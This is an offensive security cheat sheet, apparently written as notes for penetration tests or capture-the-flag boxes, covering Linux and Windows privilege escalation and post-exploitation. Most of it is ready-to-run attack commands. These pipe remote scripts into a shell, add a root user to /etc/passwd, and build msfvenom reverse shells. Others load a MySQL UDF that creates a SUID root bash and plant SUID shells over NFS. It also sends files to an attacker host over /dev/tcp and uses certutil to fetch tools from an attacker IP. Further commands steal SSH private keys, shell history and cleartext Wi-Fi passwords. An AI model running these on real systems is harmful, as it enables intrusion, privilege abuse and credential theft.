What to do once you're on the Box¶
Linux¶
sudo -l will tell you what the user is allowed to execute with sudo without entering a password. Also keep an eye on the environment variables that are inherited (env_keep info).
Check if DLL Loading is possile.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null to find SUID, SGID files.
Run curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh to get
the full information about the box, including files you're allowed to execute which has setuid flag set (sudo permissions).
You can also run another script wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh which is also very good!
You can also run wget https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh; sh ./LinEnum.sh which is an alternative to linPEAS.
To switch between users, once you have the credentials, you can use su <username> -> password.
Have a tough read which files/services can be executed as root from the current user and check with https://gtfobins.github.io/ how they can be exploted.
Here are the easiest ones.
Cookbooks for Privilege Escalations: * https://tryhackme.com/room/linuxprivesc * https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md * PayloadsAllTheThings - Methodology and Resources/Linux - Privilege Escalation.md * https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html * https://payatu.com/guide-linux-privilege-escalation
Writable /etc/passwd and /etc/shadow file¶
In case the /etc/passwd is writable we can add another line to it, adding a new user as root.
In case the /etc/shadow is writable you can replace password hashes.
The password hash is always between the first two colons like <username>:<passwordhash>:<otherthings>.
There are several ways to generate a new hash.
OpenSSL
openssl passwd -1 -salt <somesalt> <newpassword>
# -1 = optional, indicates the use of md5s
# -salt = optional, makes the hash immune against rainbow attacks
mkpasswd
mkpasswd -m sha-512 <newpassword>
Add a new user to /etc/passwd
echo <username>:<passwordhash>:0:0:<optional comment>:/root:/bin/bash >> /etc/passwd
Escaping Vi Editor¶
If vi is listed under the sudo -l output, you can simply run sudo vi and then :!sh to have a root shell trough the editor.
Exploiting crontab¶
Run cat /etc/crontab to see scheduled tasks, maybe one of them is exploitable.
Take a look at the environment variables defined in the crontab file, you could misled crontab by locating scripts.
In case a script is executed you can create a payload to create a bind/reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=<local/remote ip> lport=8888 R. Don't forget to listen for it with nc -lvnp 8888.
Exploiting PATH environment variable¶
The PATH environment variable, defined as /path1:/path2:/path3, holds all paths where an executable is searched in. The current directory is not searched as in windows, except the PATH contains a . element.
To exploit the PATH we need a SUID executable which calls another executable without a path information. Use strings <executable> to get a hint if an executable name occurs or execute the executable and check with ps/top if a sub-executable is called at a certain time.
The next step is to create a bash script with the name of the called executable containing a bind/reverse shell or simply just /bin/bash. Maybe it's requited to extend the PATH variable with export PATH=/new/path:$PATH.
cd /tmp
echo "/bin/bash" > ls
chmod +x ls
export PATH=/tmp:$PATH
# execute the SUID file now
MySql Server¶
In case the mysql server is accessible and is executed as root, we can load a dynamic library that offers us root rights. https://www.exploit-db.com/exploits/1518
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
exit
/tmp/rootbash -p
Upload SUID files via NFS¶
In case the victim server has network shares open (nmap -p 135,445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP or via cat /etc/exports) you can try to create a file on this share with the SUID bit set from the attacker server and execute it on the victim server.
Try to read the /etc/exports file which contains the setting flags for each share.
The no_root_squash flag means that the files uploaded via the share will remain their SUID bit, otherwise the SUID bit is set to "nobody".
# attacker box
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/share /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell
chmod +xs /tmp/nfs/shell
# victim box
/tmp/shell
Kernel Exploits¶
Kernel Exploits are one of the last ressorts to get higher privileges because it brings the target server in an unstable state.
Linux Exploit Suggester¶
https://github.com/mzet-/linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
chmod +x les.sh
/les.sh
Each found exploit has a level which indicates how successful the attempt would be: * Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications. * Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target. * Less probable - additional manual analysis is needed to verify if kernel is affected. * Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
Linux Exploit Suggester 2¶
https://github.com/jondonas/linux-exploit-suggester-2
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl -O les2.pl
perl les2.pl
Send files: VICTIM -> ATTACKER¶
on attacker: nc -lvnp $PORT > /file_to_save
on victim: cat $FILE > /dev/tcp/$HOSTIP/$PORT
Windows¶
- https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
- RAW: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
- CackMapExec
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/winPEAS.bat" wp.bat
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
- RAW: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/PowerUp.ps1" pu.ps1
. ./pu.ps1
Invoke-AllChecks
- Check if you can escalate with Priv2Admin
- See if you can create an hidden system account with CreateHiddenAccount
Kernel Exploits¶
Windows Exploit Suggester - Next Generation
Post Exploitation¶
Windows¶
Migrate to another process:
* ps to get processes thats stable (eg. explorer)
* psinject Listener ProcessID with processid and listener
Get windows build number:
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId
If build is < Win10 2004, try powershell/privesc/printdemon (CVE-2020-1048) with the base64 part of the stager and shell restart-computer -force for higher privilege.
Get the Loot¶
Linux¶
Get the ssh key!¶
cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa
Get the history of an user¶
cat ~/.*history | less
Get config files¶
Search the user's home directory with ls -la and see if you can find configuration directories and files!
Windows¶
Get wlan/wifi passwords on a windows machine (no admin priv needed)¶
netsh wlan export profile key=clear